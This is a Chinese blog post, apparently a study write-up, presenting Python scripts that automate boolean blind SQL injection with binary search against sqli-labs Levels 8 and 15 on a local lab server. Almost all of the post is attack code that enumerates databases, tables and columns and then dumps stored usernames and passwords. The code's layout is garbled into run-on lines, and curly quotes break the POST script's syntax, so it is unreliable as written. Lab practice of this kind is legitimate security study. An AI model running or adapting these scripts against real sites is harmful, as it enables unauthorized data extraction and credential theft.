




二分法实现SQL盲注

發布時間:2023/12/10 数据库 31 豆豆

目錄

  • 布爾盲注——GET類型
  • 布爾盲注——POST注入

好家伙,昨天在buu上看到一道SQL注入的題目,賊難受,然后就果斷放棄去看大佬們寫的wp,所以成功的花了6個小時來學習這個鬼東西,可能是自己太菜了,也可能是小甲魚python看的太少了……小甲魚的python的確講的很不錯,推薦想學python的去看看。

布爾盲注——GET類型

這里是自己寫的代碼,寫的比較爛,勿噴!
話不多說,直接上代碼,看不懂來找我(算了,還是別找我了……),這里都是以sqli-labs第八關為例子的。

# 導入爬蟲模塊 import requests # 導入時間模塊 import time# 獲取數據庫的長度 def get_DBlen(url):for i in range(1,20):payload = "' and length(database())=%d -- p"%ihtml = requests.get(url + payload)if "You" in html.text:print(f"數據庫長度為:{i}")breakreturn i# 獲取數據庫的庫名 def get_DBname(url,DBlen):DBname = ""DBlen = DBlen + 1for i in range(1,DBlen):for j in range(33,128):payload = "' and (ascii(substr((select(database())),{0},1))={1}) -- p".format(i,j)db_url = url + payloadhtml = requests.get(db_url)if "You" in html.text:DBname += chr(j)breakprint(DBname)return DBname# 獲取表的長度 def get_TBlen(url):# 表示數據表的數量TBvalue = 0for j in range(0,15):payload = "' and length((select table_name from information_schema.tables where table_schema=database() limit {0},1))>1 -- p".format(j)db_url = url + payloadhtml = requests.get(db_url)# 如果有回顯說明該表存在,存在的話就可以判斷該表的長度if "You" in html.text:passelse:TBvalue = jbreak# print(TBvalue)for j in range(0,TBvalue):# print(j):0,1,2,3for i in range(1,20):payload = "' and length((select table_name from information_schema.tables where table_schema=database() limit {0},1))={1} -- p".format(j,i)db_url = url + payloadhtml = requests.get(db_url)if "You" in html.text:print(f"數據表{j}的長度為{i}")return TBvalue# 獲取表名 def get_TBname(url,TBlen):TBnameAll = []for i in range(0,TBlen):TBname = ""for j in range(1,15):min = 32max = 128mid = (max + min) // 2while min < max:payload = "' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {0},1),{1},1))>{2} -- p".format(i,j,mid)html = requests.get(url + payload)if "You" in html.text:min = mid + 1else:max = midmid = (max + min) // 2if mid <= 32 or mid >= 127:breakTBname += chr(mid)# print(chr(mid))print(TBname)TBnameAll.append(TBname)return TBnameAll# 獲取列的列名 def get_Colname(url):for i in range(0,15):Colname = ""for j in range(1,15):min = 32max = 128mid = (min + max) // 2while min < max:payload = "' and ascii(substr((select column_name from information_schema.columns where table_name='referers' limit 
{0},1),{1},1))>{2} -- p".format(i,j,mid)html = requests.get(url + payload)if "You" in html.text:min = mid + 1else:max = midmid = (max + min) // 2if mid <= 32 or mid >= 127:breakColname += chr(mid)print("數據列名為:",Colname)# 爆數據 def get_shuju(url):for i in range(0,15):shuju = ""for j in range(1,20):min = 32max = 128mid = (min + max) // 2while min < max:payload = "' and ascii(substr((select concat(id,'~',email_id) from emails limit {0},1),{1},1))>{2} -- p".format(i,j,mid)html = requests.get(url + payload)if "You" in html.text:min = mid + 1else:max = midmid = (max + min) // 2if mid <= 32 or mid >= 127:breakshuju += chr(mid)print("數據為:",shuju)if __name__ == "__main__":# 要進行SQL盲注的鏈接url = "http://192.168.59.150/sqli-labs/Less-8/?id=1"# 數據庫的長度DBlen = get_DBlen(url)# 數據庫的庫名DBname = get_DBname(url,DBlen)# 數據表的個數TBlen = get_TBlen(url)# print(TBlen)# 表的表名# TBnameAll = get_TBname(url,TBlen)# 返回的是一個列表,表示所有的數據表名# print(TBnameAll)get_Colname(url)# 數據get_shuju(url)

能運行,運行結果比較多,就不截圖了。唉,寫的比較垃圾,大佬別噴。慢慢改進,好家伙……

下面是請教師傅,然后改的腳本,算80%的自動化吧,嗷嗷嗷……:

from operator import le import requests import timehost = "http://192.168.59.150/sqli-labs/Less-8/?"def getDatabase(): #獲取數據庫名# 將host變量變為一個全局變量global hostans=''for i in range(1,1000):low = 32high = 128mid = (low+high)//2while low < high:time.sleep(0.3)url = host + "id=1' and (ascii(substr((select(database())),%d,1))<%d) -- p" % (i,mid)res = requests.get(url)# 如果返回的是You,那么就為真的if "You" in res.text: high = midelse:low = mid + 1mid=(low + high) // 2if mid <= 32 or mid >= 127:breakans += chr(mid-1)print("database is -> "+ans)# 返回庫名return ansdef getTable(DBname): #獲取表名global hostans= ""for i in range(1,1000):low = 32high = 128mid = (low + high) // 2while low < high:time.sleep(0.3)url = host + "id=1' and (ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='{0}')),{1},1))<{2}) -- p".format(DBname,i,mid)res = requests.get(url)if "You" in res.text: high = midelse:low = mid+1mid=(low + high) // 2if mid <= 32 or mid >= 127:breakans += chr(mid - 1)print("table is -> " + ans)# 返回表名,此時表名為一個列表return ansdef getColumn(TBname): #獲取列名global hostans = ''for i in range(1,1000):low = 32high = 128mid = (low + high) // 2while low < high:time.sleep(0.3)url = host + "id=1' and (ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='{0}')),{1},1))<{2}) -- p".format(TBname,i,mid)res = requests.get(url)if "You" in res.text: high = midelse:low = mid + 1mid=(low + high) // 2if mid <= 32 or mid >= 127:breakans += chr(mid - 1)print("column is -> " + ans)# 返回一個列名return ansdef dumpTable():#脫褲global hostans=''for i in range(1,1000):low = 32high = 128mid = (low+high)//2while low < high:time.sleep(0.3)url = host + "id=1' and (ascii(substr((select(group_concat(username,password))from(users)),%d,1))<%d) -- p" % (i,mid)res = requests.get(url)if "You" in res.text: high = midelse:low = mid+1mid=(low+high)//2if mid <= 32 or mid >= 127:breakans += chr(mid-1)print("dumpTable is -> "+ans)DBname = getDatabase() # print(DBname) 
TBname = getTable(DBname) # print(type(TBname))表示是一個字符串,用來測試 TBnames = [] TBnames.append(TBname.split(',')) # 因為輸出的是一個二元數組,所以使用下面的代碼來轉為一維數組 TBnames = TBnames[0] # print(TBnames) TBlen = len(TBnames) for i in range(0,TBlen):TBname = TBnames[i]# print(TBname)getColumn(TBname)if i == TBlen - 1:break dumpTable()

布爾盲注——POST注入

直接上代碼了:(這里是以sqli-labs第15關為例的)

import requestsimport timehost = “http://192.168.59.150/sqli-labs/Less-15/def getDatabase(): #獲取數據庫名# 將host變量變為一個全局變量global hostans=for i in range(1,1000):low = 32high = 128mid = (low + high) // 2while low < high:# time.sleep(0.3)payload = “admin’ and (ascii(substr((select database()),{0},1))<{1}) — p”.format(i,mid)# print(payload)# 測試data = {“uname”:payload,”passwd”:”admin”,”submit”:”Submit”}html = requests.post(host,data)# 如果返回的是有數據,那么就為真的if “flag.jpg” in html.text:high = midelse:low = mid + 1mid = (low + high) // 2if mid <= 32 or mid >= 127:breakans += chr(mid – 1)print(“database is ->+ ans)# 返回庫名return ansdef getTable(): #獲取表名global hostans= “”for i in range(1,1000):low = 32high = 128mid = (low + high) // 2while low < high:# time.sleep(0.3)payload = “admin’ and (ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),{0},1))<{1}) — p”.format(i,mid)data = {“uname”:payload,”passwd”:”admin”,”submit”:”Submit”}html = requests.post(host,data)# 如果返回的是有數據,那么就為真的if “flag.jpg” in html.text:high = midelse:low = mid+1mid=(low + high) // 2if mid <= 32 or mid >= 127:breakans += chr(mid – 1)print(“table is ->+ ans)# 返回表名,此時表名為一個列表return ansdef getColumn(TBname): #獲取列名global hostans =for i in range(1,1000):low = 32high = 128mid = (low + high) // 2while low < high:time.sleep(0.3)payload = “admin’ and (ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='{0})),{1},1))<{2}) — p”.format(TBname,i,mid)data = {“uname”:payload,”passwd”:”admin”,”submit”:”Submit”}html = requests.post(host,data)# 如果返回的是有數據,那么就為真的if “flag.jpg” in html.text:high = midelse:low = mid + 1mid=(low + high) // 2if mid <= 32 or mid >= 127:breakans += chr(mid – 1)print(“column is ->+ ans)# 返回一個列名return ansdef dumpTable():#脫褲global hostans=for i in range(1,1000):low = 32high = 128mid = (low+high)//2while low < high:time.sleep(0.3)payload = “admin’ and 
(ascii(substr((select(group_concat(username,password))from(users)),%d,1))<%d) — p” % (i,mid)data = {“uname”:payload,”passwd”:”admin”,”submit”:”Submit”}html = requests.post(host,data)# 如果返回的是有數據,那么就為真的if “flag.jpg” in html.text:high = midelse:low = mid+1mid=(low+high)//2if mid <= 32 or mid >= 127:breakans += chr(mid-1)print(“dumpTable is ->+ans)if __name__ == “__main__”:# getDatabase()TBname = getTable()# print(type(TBname))表示是一個字符串,用來測試TBnames = []TBnames.append(TBname.split(,))# 因為輸出的是一個二元數組,所以使用下面的代碼來轉為一維數組TBnames = TBnames[0]# print(TBnames)TBlen = len(TBnames)for i in range(0,TBlen):TBname = TBnames[i]# print(TBname)getColumn(TBname)if i == TBlen – 1:breakdumpTable()

如果有哪里寫的不好的地方,還請各位師傅指教!感謝
